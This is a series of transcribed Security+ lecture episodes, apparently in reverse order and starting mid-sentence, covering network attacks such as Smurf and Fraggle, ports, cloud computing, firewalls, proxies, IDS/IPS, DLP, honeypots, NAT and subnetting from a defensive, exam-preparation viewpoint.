ICMP echo replies,and it's going to eat up a lot of bandwidth,and processing power.Now, you can see how this looks here,with the attacker sending the ping request with the IP of that server being spoofed into the request,and now the destination is sent to the broadcast of that subnet.In this example, all three PCs in the subnet are going to reply back to that ping request thinking it's from the server,and the server gets three times the amount of ping replies than if the attacker had sent it to them directly.Now, this allows that attack to be amplified,especially if the attacker can get a large subnet,like a /16 or a /8 used in this attack.The next kind of Flood Attack is what we call Fraggle.Fraggle is a throwback reference to the kids show Fraggle Rock from the 1980s,which aired around the same time as the Smurf TV show.So you can guess that Fraggle and Smurf are kind of related.Well with Fraggle, instead of using an ICP echo reply,Fraggle uses a UDP echo instead.This traffic is directed to the UDP port of seven,which is the echo port for UDP, and the UDP port of 19,which is the character generation port.This is an older attack,and most networks don't have this vulnerability anymore,and both of these ports are usually closed,'cause again, they're unnecessary.Notice that I didn't have them in your port memorization chart either.Now, because of this,Fraggle attacks are considered very uncommon today.That said, a UDP Flood Attack,which is a variant of Fraggle,is still heavily used these days.It works basically the same way as a Fraggle attack,but it uses different UDP ports.

Hello everyone my name is vijay kumar Devireddy and I am glad to have you back on my episode 70 today we're going to discuss about Unnecessary ports.As we've already discussed,there are a lot of ports available for use by your computers and your networks.We started out with 65,536 ports available back in our ports and protocol lesson.Then, we narrowed it down to 35 port that you just had to memorize in the last lesson.But does that mean that all 35 of those are necessary for your computer to function? Well, the answer is no.When it comes down to it,you aren't using all of those services,at least not all of the time.Also, if you're running a server,you wouldn't want to have all 35 of those ports open either.Why?Because many of them are unnecessary.Now, that begs the question, what makes a port unnecessary? Well, an unnecessary port is simply one that's associated with a service or a function that you don't need or is considered non-essential.For example, if you have a server whose entire function is to act as a mail relay server,all it's designed to do is send mail out,then the only thing it needs is a couple of ports open.It needs port 25 for SMTP and port 465 or 587 for SMTP over SSL and TLS.Now, every other port on that server can be shut or disabled or closed and you wouldn't care,because only those three ports are the ones you need.Remember, every open port represents an unnecessary vulnerability being left exposed if you didn't need to have that port open.So you want to close anything you're not using.Because of this, security professionals and analysts routinely scan their servers,their routers, and their firewalls to ensure that they understand exactly what ports are open in their networks and which ones they can disable or close.For example, this is a result from one of my scans and you can see there's three hosts that have ports 139 and 445 open in the network.Now, thinking back to our last lesson where you memorized all the ports,can you guess which services these machines might be running?Well, port 139 is used for net bios and port 445 is used for SMB.This means these three machines are most likely running the Windows operating system and they have file sharing enabled over the local network.Now, if these machines don't need to have file sharing enabled over the local network,we can disable these ports and remove the possible vulnerabilities that are inherent within the Windows file-sharing system.To close an unnecessary port,there are three methods you can use.First, you can stop the service that uses that port from the operating system's graphical user interface.To do that in Windows, simply open up the computer management console,select Services and Applications,and then select Services.From here, you double-click on the particular service that you want to turn off,and it's going to open up a dialog box as shown here.Now, in this example, I've stopped the Windows update service in Windows 10 from running,which will also prevent any associated open ports from remaining open because of this service running.The second method is to do this from the command line interface.As I showed you back in our operating system hardening lessons,you can turn off a service by using the net stop command and the name of the service.On a Linux server, you can do this by entering sudo stop and the name of the service at the command line.Now, the third way to do this is to block the ports at your firewall,whether this is a software or hardware-based firewall,or on the server itself.Now, usually, a firewall's going to block ports by default,and it requires you to open the port when you want to install a particular service or function.Now, for example, let's say you installed the Apache web server at one point,and this opened up port 80 on your firewall.

Hello everyone my name is vijay kumar Devireddy and I am glad to have you back on my episode 69 today we're going to discuss about In security one of the most important things is to ensure that you understand,what openings you have created in your systems.When it comes to computers and networks,most of these openings are going to be created by ports.Now a port is simply a logical communication endpoint that exists on your computer or your server.For example, if you're running a web server,you're going to have port 80 open and listening for inbound requests from your potential visitors.Now ports are classified as either inbound or outbound ports.An inbound port is used when your computer or server is listening for a connection.Just as in my earlier example,the web server had port 80 open, that's an inbound port.It's just waiting for somebody to come along and connect to it.An outbound port on the other hand, is opened by a computer whenever it wants to connect to a server.If my computer is attempting to make a connection to your web server over port 80,well, then my computer is going to open up a random high number port such as port 52363 and it's going to make an outbound request to that web server.Now, what does all this look like in the real world?Well, let's look at an example of how an inbound and outbound port are used when my laptop attempts to connect to a remote server over SSH.First, we have a server at the top of the screen and it has a public IP address assigned to it,and it's listening on port 22,so port 22 is the inbound port awaiting new connections.And in this case, port 22 is open.At the bottom of the screen,I have my laptop that wants to make the connection.Now, my laptop has a private IP address assigned because my network is using NAT at the router and that gives me some additional protections.So, notice at this point my laptop doesn't have any ports opened yet.So now my laptop wants to go and establish the SSH connection.It's going to open up an outbound port on itself,which is going to be some random high number port like 51233 and it's going to send a request to the SSH server over port 22 which is the server's inbound ports and destined for it's IP address in this case, 46.124.63.13.Now once a server receives this request,it has to respond to it.So, it's going to send a packet of information back to my laptop's IP in the outbound port that was open.In this case that's port 51233 and in reality it would be the public facing IP address of my router but for our example, I'm going to use the private IP address of 192.168.1.45.Now, that my laptop has made the request to the server and the server answered that request,we now have a session established and both devices can communicate back and forth as needed.Once that session is over,the connection is going to be closed,my laptop is going to close it's outbound port because it's no longer needed and the server will keep that inbound port open so they can receive requests from the next user who wants to use it.So now that we showed how ports work in the real world,let's talk a little bit more about the ports themselves.In addition to being called inbound and outbound ports,the ports are going to be assigned a number.Now, the number can be anywhere between 0 and 65,535 but this big range is actually divided into three smaller groups.The first group is called the Well-Known ports.This is for any ports that are between 0 and 1023.These are called Well-Known ports because they are designated by IANA the Internet Assigned Numbers Authority and they are going to assign it to commonly used protocols and ports.

Hello everyone my name is vijay kumar Devireddy and I am glad to have you back on my episode 68 today we're going to discuss about In this section of the course,we're going to discuss network attacks.There are many different types of threats out there and many of them carry out their attacks over your networks.These attacks include things like denial of service attacks,spoofing, hijacking, replays,transitive attacks, DNS attacks,and ARP poisoning.Now, before we get into all of those different types of attacks though,it's important for us to do a quick review of the basics of ports and protocols that you learned back in Network.After all, the exam is going to focus on particular ports and protocols and how it's best to secure them.So let's get started with our review of ports and protocols in the next lesson.

Hello everyone my name is vijay kumar Devireddy and I am glad to have you back on my episode 67 today we're going to discuss about We have spent a lot of time discussing the cloud in this section.But the cloud is made up of a lot of different types of servers.In this lesson we're going to discuss a few specific types of servers that may be hosted in the cloud,and how you can best secure them.First, we have file servers.File servers are used to store,transfer, migrate, synchronize and archive your files.Any computer can act as a file server in the real world.The server might be running Windows, Linux or Mac OSX as its operating system. And it really doesn't matter which.Either way, you want to make sure the file server is using proper data encryption for its files when they're at rest,that the server has monitoring and logging being performed on it,and a good host based intrusion detection system.You might also want to use data loss prevention applications to ensure the data isn't stolen and all of the normal configuration hardening and patching that we've already discussed in the past during this course.Second, we have email servers.These servers are a frequent target of attacks because they contain a lot of valuable data from within your organization.In a Windows environment,the most common email server is Microsoft Exchange.Microsoft Exchange and its Unix and Linux counterparts all support the POP3 IMAP and SMTP protocols for receiving and sending email.This means that at a minimum,we have at least three open ports and services running,but usually, there are many, many more.Because email servers are frequently a target of attacks,it's important that you insure that they are securely configured using the hardening techniques discussed earlier in this course.That you have spam filtering applications installed,and antivirus, not just for the server itself,but also to scan and quarantine all of the attachments being sent or received by your users.Next, we have a web server.In the Windows environment,this is usually hosted by Internet Information Services or IIS server.For Linux or Mac,this is usually going to be an Apache web server.Either way, web servers are by default open to the internet to perform their job.So, it's important for us to properly secure them.They should always be placed in your organizations DMZ.They should be properly firewalled,monitored, logged, audited and patched to insure their security.Always insure that your web server is up to date with the latest patches.If you aren't sure what patches need to be applied you can always visit the common vulnerability and exposure website or CVE that's hosted by the Mitre corporation.This site maintains an up to date list of every known vulnerability for every type of software that's on the market.Our fourth type of server is an FTP server.An FTP server is a specialized type of file server that's used to host files for distribution across the web.These servers can be setup to allow anonymous login and receipt of files or they can be secured with a username, password or other credentials.You might want an anonymous FTP setup,if you're distributing your software for example,or you may want a secure FTP server setup so that your remote offices can upload and download large files over the internet to your network.If you're setting up an FTP server,remember to always force an encrypted connection using the transport layer security or TLS.Because if you're going to require a username or password,you want to make sure it's protected during transmission.By default, FTP runs over ports 20 and 21,and it passes its information across the web in an unencrypted format.

Hello everyone my name is vijay kumar Devireddy and I am glad to have you back on my episode 66 today we're going to discuss about cloud security.Once we begin to rely on virtualization and cloud computing for our deployments,it becomes very important to recognize that our data might be hosted on the same physical server as another organization's data.By doing so, we introduce some vulnerabilities into the security of our systems.First, if the physical server crashes due to something one organization does,it can affect all of the organizations hosted on that same physical server.Similarly, if one organization has not maintained the security of their virtual environments being hosted on that server,there is a possibility that an attacker could utilize that to the detriment of all organizations based on that same server being hosted.Just as there are concerns when you conduct the interconnection of your networks with somebody else's,there are concerns with hosting multiple organizations' data on the same physical server that's being run by a given cloud provider.It's important for us to properly configure, manage,and audit user access to the virtual servers being hosted.Also, you should ensure that your cloud-based servers have the latest patches,anti-virus, anti-malware,and access control in place,if you're going to be using infrastructure as a service as your model.To minimize the risk of having a single physical server's resources being overwhelmed,it's a good idea to set up your virtual servers in the cloud with proper failover, redundancy,and elasticity.By monitoring the network's performance and the physical server's resources,you should be able to balance the load across several physical machines instead of relying on a single one.After all, elasticity is one of the main benefits of migrating to the cloud in the first place.Most of cloud security relies on the same security practices that you would perform for other servers,such as ensuring complex passwords are used,strong authentication mechanisms are in place,and strong encryption being used to protect your data at rest,in transit, or in process.Also, your cloud environment should have strong policies in place to ensure that it's clear what things a user may do and may not do with that cloud service.Finally, remember that the data that you're hosting in the cloud is on somebody else's physical server.If you're using a public cloud model,you need to be concerned about data remnants that could be left behind when a cloud server is deprovisioned after demand for the service is reduced.This could lead to a vulnerability where your data is available to other organizations using that same server.To prevent this, data should always be encrypted when placed in the cloud server,including the virtual hard disk files for those virtual servers that are being hosted.

Hello everyone my name is vijay kumar Devireddy and I am glad to have you back on my episode 65 today we're going to discuss about As a Service. Cloud computing also comes as four different types of services.I like to refer to these by the generalized term of as a service because as you're going to see,everything in the cloud is something as a service.The four types you need to be aware of are Software as a Service,Infrastructure as a Service,Platform as a Service,and Security as a Service.With Software as a Service,you're going to be provided with a complete solution.This includes the hardware,the operating system,the software, the applications,everything that's needed for that service to be delivered.For example, if you use Office 365 for Microsoft,this is considered Software as a Service,and it allows your end users to access their email,their Word documents, their PowerPoint presentations,and all of that directly from within their web browser.Sometimes though, you're going to have to build a customized piece of software to meet your particular service needs.In this case you might only need the service provider to give you the hardware, the operating system,and the backend server software.With Infrastructure as a Service,you get the benefit of this dynamic allocation of additional resources known as elasticity,but you don't have to deal with the headache of long-term commitments and contracts, buying the hardware,and installing the underlying operating systems.For example, you might want to contract for a new cloud-based web host to host your company's website upon.The server might be built and hosted by the cloud service provider,and come with a pre-installed Linux operating system and an Apache web server.Now, your programmers can simply create a custom application for your customers that's run on top of this web server without having to worry about the underlying operating system and hardware.The third type of service is called Platform as a Service.Under this model, the third party vendor will provide your organization with all the hardware and software needed for a specific service to operate.For example, if you're company is developing a new piece of software, they might have a development platform that's provided by a third party cloud provider.This might be an example of Platform as a Service.Now, if we want to summarize these three types,remember that Infrastructure as a Service,you're provided with everything you need to run a server,including the power, the space, the cooling,the network, the firewalls, the physical servers,and the virtualization layer.With Platform as a Service,the operating system and the infrastructure software is added to that list I just gave you.Now infrastructure software includes things like an Apache web server, a MySQL database,programming languages and lots more.With Software as a Service,the hosted application software is added to top of this infrastructure and platform portions.As you can see, Software as a Service is much closer to your end user than either Platform as a Service, or Infrastructure as a Service.Now, at the beginning of this lesson,I said that there was four types of as a service that you had to know for the exam.The fourth one is Security as a Service.

Hello everyone my name is vijay kumar Devireddy and I am glad to have you back on my episode 64 today we're going to discuss about Cloud computing isn't a single thing though,because there are many different ways to implement the cloud you should know that there are four different cloud types.Public, private, hybrid and community.The most common type of cloud architecture is the public cloud.Under this model, a service provider makes resources  available to the end user over the internet.There are numerous public cloud solutions available today,including those from google,Microsoft and Amazon.For example, google drive is a public cloud service that's offered both as a free and pay for use model.Public clouds can often be an inexpensive way for an organization to gain the required capability and service they need quickly and efficiently.The second option is what's known as a private cloud.This service requires that a company create its own cloud environment that only it can utilize as an internal enterprise resource to manage its cloud.With a private cloud, your organizations responsible for the design, implementation and operation of the cloud resources, and the servers that host them.For example, the United States Government runs a private cloud for use by different organizations within the government.But my company and yours, can't get access to it like we could with google drive.Generally, a private cloud is chosen when security is more important to the organization than cost.A hybrid cloud solution combines the benefits of both the public cloud and the private cloud options. Under this architecture,some resources are developed and operated by the organization itself like a private cloud would be but the organization can also utilize the publicly available resources or outsource services  to another service provider like a public cloud does! Because of this mixture of private and public cloud resources, strict rules should be applied for what type of data is hosted in each portion of this hybrid cloud.For example, any confidential information should always be hosted on the organization's private cloud portion.Our fourth option is known as a community cloud.Under this model, the resources and cost are shared among several different organizations who have a common service need, this is similar to taking several private clouds and connecting them together.Now, the security challenge here is that each organization may have their own security controls,remember if you connect your network to another network,you inherit their security risks as well.This doesn't change just because we've moved to the cloud environment.So, which of these four models or combination of models is right for your organization?Well, there's no clear cut answer,because it really depends on your security needs,your cost restrictions and your risk tolerance.Generally, it's cheapest to use a public cloud model,but this also increases the risk to your information's confidentiality and availability.Well, there's many other things you need to consider as a security practitioner, there is going to be no single right answer here, instead it's our job to weigh the benefits and the drawbacks of each other these models to decide which one is right for our organization's security needs and their concerns.

Hello everyone my name is vijay kumar Devireddy and i am glad to have you back on my episode 63 today we're going to discuss about Cloud Computing.These days,could computing seems to be the big trend within our industry.But what exactly is cloud computing? Well, cloud computing is defined as a way of offering on-demand services that extend the traditional capabilities of a computer or a network,out into the Internet.With the promise of increased availability,higher resiliency,and unlimited elasticity, the cloud definitely can provide our organizations a lot of advantages over our traditional network architectures. But, cloud computing can also bring a number of unique security challenges into our environments, too.For cloud computing to gain its intended cost savings and efficiencies, though,it relies heavily on the concept of virtualization.By using virtualization,numerous logical servers can be placed on a single physical server.This, in turn,can help us reduce the amount of physical space,power, and cooling,that's needed inside your data center.Additionally, by using virtualization,we can achieve higher levels of availability by spinning up additional virtual servers when necessary.This ability to dynamically provision memory and CPU resources, is one of the key benefits to cloud computing.While there are a lot of benefits to cloud computing,such as decreased cost,increased scalability,and unlimited elasticity,there are also numerous security issues that we have to consider.Most of the same security issues that we have with physical servers also get carried over into the cloud computing environment, too.Often times,I hear executives think that all of their problems will be solved by moving to the cloud.This is simply not the case.To gain these efficiencies,cloud providers rely on virtualization to allow multiple logical serversto be placed on that single physical server,as we said before.Many cloud service providers, though,have taken virtualization a step further with the concept of hyper-converged infrastructure.This allows providers to fully integrate the storage,network, and servers,without having to perform hardware changes.Instead,they rely on a software and virtualization technology to perform all of the needed integrations. All of this can be managed from a single interface or a device,without any worry about the underlying vendor solutions.Many cloud providers are also offering Virtual Desktop Infrastructure as one of their services.VDI allows a cloud provider to offer a full desktop operating system to an end user from a centralized server.There are a lot of security benefits to this approach.For example,one organization that I worked with creates a new virtual desktop image for each user,every time they log on in the morning.This desktop is non-persistent. So even if it's exploited by an attacker,it is destroyed as soon as the user logs off at the end of the day,or at midnight each night.This effectively destroys the attacker's ability to remain persistent on the end user's desktop,and adds a lot of security for us.Now, when we look at these numerous logical servers being stored on a single physical server,we also have to consider that there has to be a way to keep the data confidential and separated from the other logical servers, too.To do this,we use Secure Enclaves and Secure Volumes.Secure Enclaves utilize two distinct areas that the data may be stored and accessed from Each enclave can be accessed by the proper processor.This is a technique that's used by Microsoft Azure and many other cloud service providers.Secure volumes, on the other hand,are a method of keeping data at rest,secure from prying eyes.

Hello everyone my name is vijay kumar Devireddy and i am glad to have you back on my episode 62 today we're going to discuss about Unified threat management,the unified threat management or UTM system is a newer concept that was introduced in the last five to 10 years.Basically, security professionals realized as I'm sure you're realizing now too,that relying on a single firewall is not enough to protect our networks,and so a UTM was created, now a unified threat management system is a combination of network security devices and technologies that are added to a network to better protect it.Simply put a UTM is a single device that combines many other devices and technologies into it.For example your UTM might include a firewall,a network intrusion detection system,or a network intrusion prevention system,a content filter or a proxy, an antivirus or anti-malware gateway, a data loss prevention system,and maybe even a site to site VPN if you have the need.Now these devices are designed to make it easier for a security administrator to use them.And instead of relying on a command line interface,with all the tech space commands,they get a graphical user interface instead.It allows them to make policies, rules, and signatures,that makes it much easier and much quicker to use.Now UTM's provide a singular package with multiple protections.And they are essentially a defense in depth strategy within a single device or system.Because of this often these devices will replace your firewall, and it's usually placed as the outer most device in your local area network.To provide its' perimeter defense and its' protections.You may have also heard the term, Next Gen Firewall,or Next Generation Firewall, also known as NGFW.If you've heard this term, it's because it's being used in the industry instead of using the term UTM or unified threat management.These are those all in one security devices and that's all a Next Generation Firewall is.This is a marketing ploy because people weren't understanding the UTM concept,but they understood firewalls,and so calling it a Next Generation Firewall helped them increase sales.

Hello everyone my name is vijay kumar Devireddy and i am glad to have you back on my episode 61 today we're going to discuss about NIDS versus NIPS.Now, we've already spoken a little bit about intrusion detection and intrusion prevention systems earlier on in this course.In this lesson though, we're going to focus on the differences between a network based IDS and a network based IPS.A Network Intrusion Detection System,or a NIDS, is a type of IDS that attempts to detect malicious network activities.For example, port scans and denial of service attacks.Now, this is a device that's usually placed either before the firewall, so that it can be directly exposed to all of the traffic that's coming in,or right behind the firewall.Personally though, I like to have my NIDS placed behind the firewall, as this helps filter the amount of traffic that we'd have to see and review, since the firewall is already going to block a lot of it for us.Generally, your Network Intrusion Detection System will be placed into what's known as promiscuous mode.This allows it to see all of the traffic that crosses the network instead of just the traffic that's destined for it's own Mac address This is easily done through the configuration of the NIDS, and by placing your NIDS on a span port of your network switch so that it can receive all of the traffic moving through that switch, and not just the traffic on it's own switch port.A NIDS can only detect, monitor, and alert on traffic based on signature base rules or heuristics,and, it won't do anything to actually stop an attack from occurring.When you're dealing with a NIDS,all it's going to do is log it,and let you know about it.A Network Intrusion Prevention System, or NIPS on the other hand, is a type that's designed to inspect traffic and based on it's configuration or security policy,it can also remove, detain, or redirect that malicious traffic.That means a NIPS can not only detect it and log it like an IDS does,but it can also stop that ongoing attack by blocking the IP address that's causing issues or shutting down the connection.But, to be able to effectively take these actions,the NIPS has to be installed in line,in your network.Again, I like to place my NIPS in line,just behind the firewall.This way it's just inside the network perimeter and it allows me to have a good vantage point for it.Remember, when you're using a NIPS to block an ongoing attack,you want to ensure that the NIPS is properly tuned.If you didn't tune it properly with the right signatures, you could have a lot of false positives, and since these would be terminated, it could cause an inadvertent denial of service for your network if it tries to prevent what it thinks is malicious traffic from flowing into the network.Now, because a NIPS is an in line device,you also have to think about what's going to happen if that device fails.Should that device fail open, or should it fail shut?If you set the device to be configured to fail open, this means that the NIPS is going to simply let all of the traffic through it whenever it fails.This is less secure obviously,and so you have to think about if this is really what you want.Now, if you choose to fail shut on the other hand,the device is going to block all the traffic if it fails for some reason.This means that it's going to create a denial of service condition for your entire network,which is also pretty bad.For this reason, most organizations choose to fail open with their Network Intrusion Prevention Systems, and rely on other defensive layers to provide some layer of protection, until the NIPS can be brought online again and fixed.Now, in addition to providing their NIDS and NIPS functions, these devicesalso can be used as a protocol analyzer.

Hello everyone my name is vijay kumar Devireddy and i am glad to have you back on my episode 60 today we're going to discuss about Data loss prevention.Data loss prevention, or DLP systems,are designed to protect data by conducting content inspection of your data as it's being sent out of your organization's network.While data loss prevention is the most commonly used term,it's also referred to as ILP for Information Leak Prevention or EPS, Extrusion Prevention Systems.Usually these systems are installed as a network based DLP or a Cloud based DLP.For example, my company happens to use a Cloud based DLP through Google's G Suite.Anytime one of our employees tries to send information outside of our own domain through email,that email is flagged and they have to verify that they understand the data is being sent outside of security.com We have our DLP set to low because we communicate with so many people outside of our organization on a daily basis.But if we wanted to, we could force a higher security level and make each email being sent be checked and verified by a third employee before it was sent out to ensure that no confidential data was being left outside of our network.Now, there's also automated ways to do this,so you can flag particular emails based on key words or a no-no list and prevent any files or emails from being transferred with those keywords inside of them.It all depends on how you want to configure your DLP.DLPs are used to ensure your data stays within your network,that it isn't leaked out to outsiders,and that the privacy of your confidential data remains private.That's the whole goal here.We want to make sure that data isn't being sent outside of your network over and over again and have this massive data exfiltration going on.DLP systems can help you with that.

Hello everyone my name is vijay kumar Devireddy and i am glad to have you back on my episode 59 today we're going to discuss about Honeypots and honeynets.Honeypots and honeynets are used to attract and trap potential attackers to counteract any attempts at unauthorized access to your organization's network.Now, a honeypot is generally a single computer,but it could also be a file, a group of files, or an area of unused IP address space that might be considered attractive to a would-be attacker.A honeynet, on the other hand,is one or more computers, servers,or an area of the network.And often, this is used when a single honeypot is not deemed to be sufficient for your purposes.Now, why would we use honeynets and honeypots in our network?Well, this is usually used as a form of research,to try to learn about attackers.For example, the Honeynet Project at honeynet.org is a well-known honeynet that's in use today.It's used to learn the tools, tactics,and motives involved in computer and network attacks.And then they share what they learned with all of the different organizations out there.Your organization likely isn't going to put up a honeypot on it's own, unless you're part of a security operation center for a large company who's trying to develop better countermeasures.For example, security researchers at companies like Microsoft, Google, and Apple might run a honeypot or a honeynet to try to better be prepared in the defense of their systems,and better understand the bad guys' techniques and tactics.But for most of us,honeypots and honeynets are just something we have to memorize.

Hello everyone my name is vijay kumar Devireddy and i am glad to have you back on my episode 58 today we're going to discuss Proxy Servers.A proxy server is a device that acts as a middle man for your clients.For example, if you're at work and you wanted to connect to ,your work computer's likely going to go from itself, to a proxy server within your company's LAN.And then, that proxy server makes the connection to Dion Training to get the information that you requested.And then it will hand it back to you.This middle man approach allows the company to log everything that's being requested,who made them, and to filter out things they don't want you to access.There are four types of proxies in use today.IP Proxy, Caching Proxy, Content Filter,and Web Security Gateways.An IP Proxy is used to secure a network by keeping machines behind it anonymous.When your work computer decides to connect to through the proxy in my example above,my server doesn't know which particular computer is actually connected to it from your company's network.All I see is the proxy server itself.This is because your proxy is using NAT to translate your request from your machine into a request from the proxy.If you had 20 different computers on there tryin' to access my web server,it would still just look like one machine to my server, not 20.The next type is called a Caching Proxy.Caching Proxies are used to attempt to serve client requests without actually connecting to the remote server each time.Let's say that you went to my website at diontraining.com,and then your coworker,five minutes later, tried to go to diontraining.com,just like you did.Well, the proxy, if it's using a cache,is going to be able to keep a copy of my webpage from the first time it fulfilled your request.Then, when your coworker requested it,it would simply give it from its cache instead of going and getting a new copy from my site.This will allow your company to save on bandwidth costs,and increase the speed of delivery for your coworker, because it already has it locally,inside your network.The most common caching proxy is known as an HTTP Proxy,which attempts to cache the web pages that are visited by users, such as the example I just gave you.Caching proxies are not as effective as they used to be, though,because we all live in a Web 2.0 world with lots of customized content being served up to us.So, for example, if you went to Facebook.com and your coworker went to Facebook.com,both of your Facebook feeds look drastically different, don't they?This is because you each get different information based on your friends and your likes and your desires.So caching here isn't very helpful because of this Web 2.0 structure.Also, most caching proxies only keep a copy of the information they get for about 24 hours.And after 24 hours, they're going to go back out and request a new copy to ensure that they get the latest information.Now, to simplify the installation and configuration of a caching proxy in your web browser,there's a special type of file called a PAC, a Proxy Auto-Configuration file.This file contains the settings needed for a host to connect to the proxy server.Unfortunately though,these files are subject to modification, and could be used to redirect the user to an attacker's control proxy instead of your organization's.For this reason, it is better to disable the PAC files, and manually configure your proxy settings on your host machines, or you can push these out using a global policy object, or GPO update.Now, the third type of proxy is called an Internet Content Filter.These are used in large organizations as a way to prevent users from getting to stuff that they don't want you to access at work..

Hello everyone my name is vijay kumar Devireddy and i am glad to have you back on my episode 58 today we're going to discuss Firewalls. Firewalls are primarily used to section off and protect one network from another.Now when we talk about firewalls, there's three main types.There's software-based, hardware-based,and embedded firewalls.Software-based firewalls are run as a piece of software on a host or a server.In fact, if you're running a Windows server,those have a built-in Windows Firewall that you can enable.Hardware firewalls, on the other hand,are a standalone device that's actually an appliance that's installed into your network.It looks like another switch or another router that goes into your network stack.The third type of firewall is known as an embedded firewall.Embedded firewalls work as a single function out of many on a single device.So if you have a small office home office router or a unified threat management device,these are examples of an embedded firewall.It's one piece of the larger device that does many different functions.Firewalls can operate in many different ways.The first one is packet filtering.Packet filtering is going to inspect each packet as it passes through the firewall, and it'll accept it or reject it based on the rules that it's been given.This relies on the firewall's configuration and the access control list that's been installed.If I'm running a web server, for example,I would configure my firewall to allow traffic inbound on port 80 and port 443 but close all of the other ports because port 80 gives web traffic,and port 443 gives secure web traffic,and so, those are expected to be used.There are two types of packet filtering,stateless and stateful.With stateless packet filtering,it's simply going to accept or reject packets based on the IP address and the port number that was requested.So if I'm running a web server and you requested to come in on port 80,I would allow that,but if you requested to come in on port 53,I would deny it because it's not in my access control list.Now a stateful packet filter, on the other hand,is going to keep track of requests that leave through the firewall.So if I make a request from a host through the firewall,it will temporarily open up a port number that I made the request from,some random high port number like 50,000 or 56,000.By using stateful packet inspection,you can almost entirely eliminate IP spoofing as a threat because the firewall is going to inspect the header of each packet being received.It's then going to compare that against what it was expecting based on the request that recently went out,and then, it's going to make its accept or reject decisions based on this addition information.This is a much more in-depth inspection than a stateless one does.Now, NAT filtering is another type of filtering we can do.This is going to filter traffic according to the port,whether it's a TCP or UDP port.This filtering can be done by simply checking the endpoint connections, by matching the incoming traffic to the requesting IP,and by matching the incoming traffic to the requesting IP address and port.Now, the next one we have is an application-layer gateway,or ALG.This is going to apply security mechanisms to specific applications such as FDP or Telnet.Now, instead of blocking traffic based on the Telnet port of port 23, instead, it's going to inspect each packet and determine which application it was meant for,and if it finds out that it was meant for Telnet,it would block it because that was unauthorized.This is a resource-intensive process,but it is a powerful layer of security that can be added on into your network.These are also known as Layer 7 firewalls because they operate at the application layer..Now, once that connection is established,the packets can then be sent or received without any further inspection or checks because all of that was done during the session establishment.

Hello everyone my name is vijay kumar Devireddy and i am glad to have you back on my episode 56 today we are discussing about Telephony devices.Telephony is a term that's used for a device that provides voice communication to your end users.Originally, telephony was used in networks to make connections with the outside world such us through your modem.So a modem was this old device that we used to use that would allow us to modulate and demodulate digital information into an analog signal that could transmit over a standard dial-up connection. So if you used AOL as a dial-up connection way back in the day,you would put your phone line into your computer,it would take your ones and zeros,convert them into signals of sound and transmit that over the phone line.Now, modems were a great attack vector though from the security perspective.And for the Security you need to know the concept of war dialing.War dialing is simply when an attacker starts dialing random phone numbers to see if any modems would answer on the other side. So a lot of servers back in those days will have dial-up modems so that remote technicians could dial into the server,gain access and make changes to due support.Well, if I was an attacker and I started dialing random numbers like 555-1234,nobody there.555-1235 and just keep adding numbers,eventually, I'll find some server that answers.And if they do, I now have a way into that network. So how do we protect modems in our systems for any dialog resources that we may have from this type of thing like war dialing?Well, one of the main things to do is use a callback feature.If you still have modems, which most of us don't in our networks anymore, but if you do,you want to make them set so that when somebody calls in,they would then hang up and the modem, if it recognize that phone number based on caller ID will then call them back and initiate the connection.This will verify that the person is who they think they are and who they say they are.Now, you always want to also use some form of authentication,like a username or password.But preferably, you want to use something more complex like two factor or multi-factor authentication.The best practice though is to do what most of us have done,and that's eliminate modems where possible and switch to remote access to using things like an SSH connection over VPN tunnels.Now, while it's great to try to eliminate all your modems,sometimes, you still have old systems and you simply can't do that.If you have to maintain a dial-up modem for some reason,you want to make sure you keep that dial-up number a secret.And so somebody's going to have to work hard to be able to find it and be able to get into your system.Again, if you have a dial-up modem,you want to use good authentication.You want to be able to use things that will help prevent it like callbacks and other things to help secure it,because these are prime targets for attackers.Now, the next type of telephony equipment I want to talk about is a PBX system. A PBX equipment is something you're going to find much more often in your networks than you are going to find modems.A PBX system stands for a Public Branch Exchange.Essentially, this is the telephone system that runs all of the internal phone lines for your company.If you're sitting in your office and you want to call your accountant inside the office and you dial the last four digits of his phone number only to get him, that internal call is being routed through your PBX system,through that public branch exchange.

Hello everyone my name is vijay kumar Devireddy and i am glad to have you back on my episode 56 today we are discussing about Network Address Translation Network Address Translation or NAT is the process of changing an IP address while it transits across a router.Now, in network plus we discussed how this was used because we wanted to conserve public IP addresses because they were limited in IPv4.In security plus though we are going to gain an additional benefit when we use NAT,we can actually hide our internal networks from attackers.Now, the most commonly used type of NAT is what we call Port Address Translation or PAT.This is where we have a single public IP address assigned to a router and all of the private IP addresses that are assigned inside to our host.In your small office, home office network,this is most likely what you are using.Now, when a host wants to communicate out over the WAN,it's going to send the request to the router and the router is then going to forward the request out to the internet to the server that its trying to get to,on behalf of the host.And when it does this, it keeps track of the translation it does by using a unique random high port number for each request. This means if the attacker is getting your network from the outside,they are only going to see that single public IP address of the router and they are not going to see the fact that you have one, five ten or 100 hosts inside of your network, and they are not going to be able to exactly know how many devices there are or what kind they are.So, for the Security plus exam,in addition to knowing about NAT and PAT,you should remember that there is public and private IP scopes.Now, when you start talking about private IP ranges,you should have learnt those back in A plus and Network plus.If you didn't, I'm going to give you a quick review.Class A is anything that starts with a 10, so 10.0.0.0 all the way up through 10.255.255.255 Now in class B, we have IP address that start with 172.16.0.0 all the way up through 172.31.0.0 Essentially anything that starts with a 172.16 all the way up through 172.31 Class C is really easy to remember as well,and its probably what you are using at home its 192.168.0.0 all the way up to 192.168.255.255 So if its starts with a 192.168,it is also a private IP address.Remember, private IP addresses cannot be transmitted over the internet So instead, once they hit your external router,it's going to use either PAT or NAT to give it a public IP address and a port number to send the information out to the internet and then receive it back.

Hello everyone my name is vijay kumar Devireddy and i am glad to have you back on my episode 55 today we are discussing about Subnetting.Subnetting is the act of creating subnetworks logically through the manipulation of IP addresses.So if I take a large chunk of IPs,like a 256 block, I can break it down into four blocks of 64 IPs,or eight blocks of 32 IPs, however you want to break it down in your subnetting,which you learned back in Network Plus.Now, subnetting has some benefits to our network. First, it allows us to more efficiently use the IP address space that we've been given,and it's going to reduce the broadcast traffic and the number of collisions,because there's less hosts on any given network.But it also can increase our security by making our networks more compartmentalized and allows them to be in smaller sections.Any time information wants to go from one subnet to another,it has to be routed through. And that gives us an additional place to place access control lists and other things to our router to give us additional security.Now, you can use subnets to help secure your network by doing a couple of different things.First, you want to assign different policies to each subnet.For example, I might have a subnet that's associated with my printers,and those have different policies than the ones associated with my servers,and those have different policies than the ones associated with my office workers' desktop computers. Each of those can have different policies for each subnet. Also, you want to be able to monitor all of your subnets and check the traffic that's going into and out of them.By using subnets, we can help isolate an attack, as well,because all traffic 